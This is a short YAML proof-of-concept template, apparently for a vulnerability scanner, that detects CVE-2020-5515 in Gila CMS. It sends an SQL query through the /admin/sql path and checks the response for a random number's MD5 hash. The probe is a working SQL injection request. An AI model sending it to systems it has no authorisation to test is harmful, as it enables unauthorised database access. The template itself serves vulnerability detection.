name: poc-yaml-gilacms-cve-2020-5515
set:
  r1: randomInt(200000000, 210000000)
rules:
  - method: GET
    path: /admin/sql?query=SELECT%20md5({{r1}})
    expression: |
      response.body.bcontains(bytes(md5(string(r1))))
detail:
  author: PickledFish(https://github.com/PickledFish)
  links:
    - https://infosecdb.wordpress.com/2020/01/05/gilacms-1-11-8-admin-sqlquery-sql-injection/